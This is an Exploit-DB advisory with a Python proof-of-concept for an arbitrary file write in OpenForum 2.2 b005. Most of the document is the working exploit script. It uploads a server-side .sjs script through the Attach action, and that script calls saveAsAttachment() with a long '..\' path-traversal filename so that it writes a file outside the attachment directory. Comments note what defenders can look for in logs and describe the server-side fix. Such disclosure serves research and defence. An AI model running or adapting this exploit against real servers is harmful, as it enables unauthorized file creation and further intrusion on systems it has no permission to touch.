OpenForum 2.2 b005 - 'saveAsAttachment()' Method Arbitrary File Creation

EDB-ID:

34035

CVE:

N/A




Platform:

PHP

Date:

2010-05-23


# source: https://www.securityfocus.com/bid/40364/info
# 
# OpenForum is prone to a vulnerability that may allow remote attackers to create arbitrary files on a vulnerable system.
# 
# Successful exploits will allow an attacker to create arbitrary files, which may then be executed to perform unauthorized actions. This may aid in further attacks.
#
# OpenForum 2.2 b005 is vulnerable; other versions may also be affected.
#

#============================================================================================================#
#   _      _   __   __       __        _______    _____      __ __     _____     _      _    _____  __ __    #
#  /_/\  /\_\ /\_\ /\_\     /\_\     /\_______)\ ) ___ (    /_/\__/\  ) ___ (   /_/\  /\_\ /\_____\/_/\__/\  #
#  ) ) )( ( ( \/_/( ( (    ( ( (     \(___  __\// /\_/\ \   ) ) ) ) )/ /\_/\ \  ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\\ \_\ /\_\\ \_\    \ \_\      / / /   / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/  #
# \ \ /  \ / // / // / /__  / / /__   ( ( (    \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ /  \ / // /__/_\ \ \ \ \  #
#  )_) /\ (_(( (_(( (_____(( (_____(   \ \ \    \ \/_\/ /   )_) )    \ \/_\/ /  )_) /\ (_(( (_____\)_) ) \ \ #
#  \_\/  \/_/ \/_/ \/_____/ \/_____/   /_/_/     )_____(    \_\/      )_____(   \_\/  \/_/ \/_____/\_\/ \_\/ #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# Vulnerability............Arbitrary File Write                                                              #
# Software.................Open Forum Server 2.2 b005                                                        #
# Download.................http://code.google.com/p/open-forum                                               #
# Date.....................5/23/10                                                                           #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# Site.....................http://cross-site-scripting.blogspot.com/                                         #
# Email....................john.leitch5@gmail.com                                                            #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# ##Description##                                                                                            #
#                                                                                                            #
# An arbitrary file write vulnerability in the saveAsAttachment method of Open Forum Server 2.2 b005 can be  #
# exploited to write to the local file system of the server.                                                 #
#                                                                                                            #
#                                                                                                            #
# ##Exploit##                                                                                                #
#                                                                                                            #
# Upload a get.sjs file that calls the vulnerable method. Request the script's containing folder.            #
#                                                                                                            #
#                                                                                                            #
# ##Proof of Concept##                                                                                       #
#                                                                                                            #
import sys, socket
# Target of the proof of concept. send_request() opens a raw TCP socket to
# (host, port) and writes an HTTP/1.1 request by hand, so there is no TLS
# and no hostname resolution beyond what socket.connect() does. The
# defaults point at a local instance.
host = 'localhost'
port = 80

def send_request(request):
    """Send one raw HTTP request to (host, port) and return the reply.

    The reply is the concatenation of exactly two recv(8192) reads; the
    function does not read to EOF and does not close the socket. A
    timeout is raised as socket.timeout and propagates to the caller.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # The server can be slow to answer, so allow a generous wait before
    # giving up on either connect() or recv().
    sock.settimeout(32)
    sock.connect((host, port))
    sock.send(request)

    # Two fixed-size chunks rather than a read-until-EOF loop; the socket
    # is intentionally left open, matching the original behaviour.
    first_chunk = sock.recv(8192)
    second_chunk = sock.recv(8192)
    return first_chunk + second_chunk

def write_file():
    # Proof of concept for the arbitrary file write: upload a server-side
    # script (get.sjs) as a forum attachment, then request it so that the
    # script itself calls the vulnerable saveAsAttachment() with a traversal
    # path. For defenders, the two requests below are what to look for in
    # access logs or upload filters: a multipart upload whose filename has
    # a server-side script extension, and an attachment name built from
    # repeated "..\" segments.
    try:
        # Multipart body with a single part named "file" (filename get.sjs).
        # The part's content is the script the server is expected to run.
        # fileName is 256 "..\" segments followed by x.txt: the Python literal
        # '..\\\\' yields two backslashes, which the embedded string literal
        # collapses to one, so saveAsAttachment() receives a name that walks
        # up out of the attachment directory. The server-side fix is to
        # canonicalize the attachment name and reject anything that resolves
        # outside the intended directory. The delimiter lines are "--" plus
        # the boundary declared in the Content-Type header below ("--x--").
        content = '----x--\r\n'\
                  'Content-Disposition: form-data; name="file"; filename="get.sjs"\r\n'\
                  'Content-Type: application/octet-stream\r\n\r\n'\
                  'fileName = "' + '..\\\\' * 256 + 'x.txt";\r\n'\
                  'data = "hello, world";\r\n'\
                  'user = transaction.getUser();\r\n'\
                  'wiki.saveAsAttachment("x",fileName,data,user);\r\n'\
                  'transaction.sendPage("File Written");\r\n\r\n'\
                  '----x----\r\n'
        
        # Upload the script through the Attach action. Note the request line
        # has no leading "/" before OpenForum/... (kept as written).
        # Content-Length is computed from the body so the server reads
        # exactly the multipart payload.
        response = send_request('POST OpenForum/Actions/Attach?page=OpenForum HTTP/1.1\r\n'
                                'Host: ' + host + '\r\n'
                                'Content-Type: multipart/form-data; boundary=--x--\r\n'
                                'Content-Length: ' + str(len(content)) + '\r\n\r\n' + content)

        # A 302 is taken as the sign that the attachment was stored; any
        # other reply is treated as failure.
        if 'HTTP/1.1 302 Redirect' not in response:
            print 'Error writing get.sjs'
            return
        else: print 'get.sjs created'
        
        # Request the folder that holds get.sjs; per the Exploit notes above
        # this is what causes the uploaded script to run (the server's
        # handling of .sjs files is not shown here).
        response = send_request('GET OpenForum HTTP/1.1\r\n'
                                'Host: ' + host + '\r\n\r\n')

        # "File Written" is the text the uploaded script emits via
        # transaction.sendPage() after saveAsAttachment() returns.
        if 'File Written' not in response:
            print 'Error writing to root'
            return
        else: print 'x.txt created in root'
        
    except Exception:
        # Best-effort PoC: socket/timeout errors are printed, not re-raised.
        print sys.exc_info()          

# Module-level side effect: the PoC runs as soon as the file is executed or
# imported; there is no __main__ guard.
write_file()